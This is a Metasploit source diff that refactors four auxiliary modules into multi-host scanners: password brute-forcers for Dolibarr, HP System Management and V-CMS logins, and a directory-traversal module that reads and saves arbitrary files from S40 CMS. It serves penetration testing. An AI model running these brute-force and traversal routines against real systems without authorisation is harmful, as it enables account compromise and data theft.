diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index 58ab1e19d5..f1f6807e4a 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid_token
res = send_request_raw({
'method' => 'GET',
- 'uri' => normalize_uri(@uri.path)
+ 'uri' => normalize_uri(@uri)
})
return [nil, nil] if res.nil? || res.get_cookies.empty?
@@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
#
sid, token = get_sid_token
if sid.nil? or token.nil?
- print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
+ vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort
else
vprint_status("#{peer} - Using sessiond ID: #{sid}")
@@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_cgi({
'method' => 'POST',
- 'uri' => normalize_uri("#{@uri.path}index.php"),
+ 'uri' => normalize_uri("#{@uri}index.php"),
'cookie' => sid,
'vars_post' => {
'token' => token,
@@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end
if res.nil?
- print_error("#{peer} - Connection timed out")
+ vprint_error("#{peer} - Connection timed out")
return :abort
end
@@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = target_uri.path
- @uri.path << "/" if @uri.path[-1, 1] != "/"
+ @uri << "/" if @uri[-1, 1] != "/"
+ super
+ end
+
+ def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
index 360c344f0e..e6a952ae97 100644
--- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
+++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
@@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
- print_error("#{peer} - Connection timed out")
+ vprint_error("#{peer} - Connection timed out")
return :abort
end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
- print_error("#{peer} - Failed to response")
+ vprint_error("#{peer} - Failed to response")
return :abort
end
@@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
end
- def run
+ def run_host(ip)
if anonymous_access?
print_status("#{peer} - No login necessary. Server allows anonymous access.")
return
diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb
index b2384421b6..b7382d44ca 100644
--- a/modules/auxiliary/scanner/http/s40_traversal.rb
+++ b/modules/auxiliary/scanner/http/s40_traversal.rb
@@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
- def run
+ def run_host(ip)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
- print_status("Retrieving #{datastore['FILE']}")
+ vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
@@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
- print_error("Server timed out")
+ vprint_error("#{peer} - Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/
- print_error("Either the file doesn't exist, or you don't have the permission to get it")
+ vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
else
# We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case
- print_line(res.body)
+ print_good("#{peer} - #{datastore['FILE']} retrieved")
+ vprint_line(res.body)
if datastore['SAVE']
p = store_loot(
@@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
res.body,
::File.basename(datastore['FILE'])
)
- print_status("File saved as: #{p}")
+ print_good("#{peer} - File saved as: #{p}")
end
end
end
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index f8ecb4781e..ac4e3e77cb 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'V-CMS Login Utility',
'Description' => %q{
- This module attempts to authenticate to an English-based V-CMS login interface.
- It should only work against version v1.1 or older, because these versions do not
- have any default protections against bruteforcing.
+ This module attempts to authenticate to an English-based V-CMS login interface. It
+ should only work against version v1.1 or older, because these versions do not have
+ any default protections against bruteforcing.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
@@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
- OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/'])
+ OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
], self.class)
end
@@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid
res = send_request_raw({
'method' => 'GET',
- 'uri' => @uri.path
+ 'uri' => @uri
})
# Get the PHP session ID
@@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user, pass)
begin
sid = get_sid
+ if sid.nil?
+ vprint_error("#{peer} - Failed to get sid")
+ return :abort
+ end
+
res = send_request_cgi({
'uri' => "#{@uri}process.php",
'method' => 'POST',
@@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
'sublogin' => '1'
}
})
-
location = res.headers['Location']
-
res = send_request_cgi({
'uri' => location,
'method' => 'GET',
@@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user
when /Invalid password/
vprint_status("#{peer} - Username found: #{user}")
- else /\/
+ when /\/
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
@@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = normalize_uri(target_uri.path)
- @uri.path << "/" if @uri.path[-1, 1] != "/"
+ @uri << "/" if @uri[-1, 1] != "/"
+ super
+ end
+
+ def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)